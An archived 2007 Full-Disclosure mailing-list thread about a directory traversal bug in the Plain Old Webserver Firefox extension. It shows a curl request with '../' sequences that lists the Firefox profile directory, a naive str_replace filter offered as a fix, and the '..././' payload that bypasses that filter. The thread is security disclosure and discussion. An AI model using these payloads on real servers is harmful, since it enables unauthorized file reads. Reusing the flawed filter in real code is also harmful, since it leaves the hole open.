Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Stefano Di Paola wrote: > Plain Old Web Server > Good Old Dir Traversal > > curl "127.0.0.1:6670/../../../../" -kivvv > * About to connect() to 127.0.0.1 port 6670 > * Trying 127.0.0.1... connected > * Connected to 127.0.0.1 (127.0.0.1) port 6670 >> GET /../../../../ HTTP/1.1 Yep, I think it's just a rite of passage for all web servers. Matthew Flaschen signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
All depends on in the request processing you apply the fix. Its possible that URL Decoding hasn't occuried yet, whereby I can bypass your filter pretty easily. Not to mention Unicode... Billy Hoffman -- Lead Researcher, SPI Labs SPI Dynamics Inc. - http://www.spidynamics.com Phone: 678-781-4800 Direct: 678-781-4845 -Original Message- From: ascii [mailto:[EMAIL PROTECTED] Sent: Friday, February 09, 2007 7:29 PM To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [WEB SECURITY] Plain Old Webserver - The coolest firefox extension pdp (architect) wrote: > hei man, this is not a news :) hehe, the maintainer should update the changelog with this feature then :-) i suggest this fix for the directory traversal bug path = str_replace('../', '', path); regards, Francesco 'ascii' Ongaro http://www.ush.it/ ..././..././..././..././ how can't you love funsec? Join us on IRC: irc.freenode.net #webappsec The Web Security Mailing List: http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/ http://www.webappsec.org/rss/websecurity.rss [RSS Feed] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
I thing that there is an implicit joke in the previous post... "..././..././..././..././" how can't you love funsec? path = str_replace('../', '', path); Becomes "../../../../" again... GF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Billy Hoffman wrote: > All depends on in the request processing you apply the fix. Its > possible that URL Decoding hasn't occuried yet, whereby I can bypass > your filter pretty easily. Not to mention Unicode... hehehe i was waiting for this : ) remember: this is funsec the bypass for the filter is in the signature of the same mail > path = str_replace('../', '', path); > > regards, > Francesco 'ascii' Ongaro > http://www.ush.it/ > > ..././..././..././..././ > how can't you love funsec? cause ..././..././..././..././ becomes ../../../../ since the replace is applied only once. simple logic trick, no encoding at all see you, Francesco 'ascii' Ongaro http://www.ush.it/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
hei man, this is not a news :) On 2/9/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote: > Plain Old Web Server > Good Old Dir Traversal > > curl "127.0.0.1:6670/../../../../" -kivvv > * About to connect() to 127.0.0.1 port 6670 > * Trying 127.0.0.1... connected > * Connected to 127.0.0.1 (127.0.0.1) port 6670 > > GET /../../../../ HTTP/1.1 > > User-Agent: HackTheHacker(tm) > > Host: 127.0.0.1:6670 > > Accept: */* > > > < HTTP/1.1 200 OK > HTTP/1.1 200 OK > < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; > path=/; > Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; > < Content-Type: text/html > Content-Type: text/html > < pow_server: POW/0.0.7 > pow_server: POW/0.0.7 > < Content-Location: /../../../../ > Content-Location: /../../../../ > < Content-Length: 280 > Content-Length: 280 > > > firefox/ > bookmarks.html > appreg > default/ > pluginreg.dat > * Connection #0 to host 127.0.0.1 left intact > * Closing connection #0 > > > A new motto is on the way: > HackTheHacker (ascii (tm)) > > :) > > Cheers, > Stefano > > Il giorno ven, 09/02/2007 alle 16.23 +, pdp (architect) ha scritto: > > http://www.gnucitizen.org/blog/plain-old-webserver > > > > Must have Firefox Extension that allows you to do all sorts of crazy stuff. > > > > https://addons.mozilla.org/firefox/3002/ > > > -- > ...oOOo...oOOo > Stefano Di Paola > Software & Security Engineer > > Web: www.wisec.it > .. > > -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
pdp (architect) wrote: > hei man, this is not a news :) hehe, the maintainer should update the changelog with this feature then :-) i suggest this fix for the directory traversal bug path = str_replace('../', '', path); regards, Francesco 'ascii' Ongaro http://www.ush.it/ ..././..././..././..././ how can't you love funsec? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Plain Old Web Server Good Old Dir Traversal curl "127.0.0.1:6670/../../../../" -kivvv * About to connect() to 127.0.0.1 port 6670 * Trying 127.0.0.1... connected * Connected to 127.0.0.1 (127.0.0.1) port 6670 > GET /../../../../ HTTP/1.1 > User-Agent: HackTheHacker(tm) > Host: 127.0.0.1:6670 > Accept: */* > < HTTP/1.1 200 OK HTTP/1.1 200 OK < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; < Content-Type: text/html Content-Type: text/html < pow_server: POW/0.0.7 pow_server: POW/0.0.7 < Content-Location: /../../../../ Content-Location: /../../../../ < Content-Length: 280 Content-Length: 280 firefox/ bookmarks.html appreg default/ pluginreg.dat * Connection #0 to host 127.0.0.1 left intact * Closing connection #0 A new motto is on the way: HackTheHacker (ascii (tm)) :) Cheers, Stefano Il giorno ven, 09/02/2007 alle 16.23 +, pdp (architect) ha scritto: > http://www.gnucitizen.org/blog/plain-old-webserver > > Must have Firefox Extension that allows you to do all sorts of crazy stuff. > > https://addons.mozilla.org/firefox/3002/ > -- ...oOOo...oOOo Stefano Di Paola Software & Security Engineer Web: www.wisec.it .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/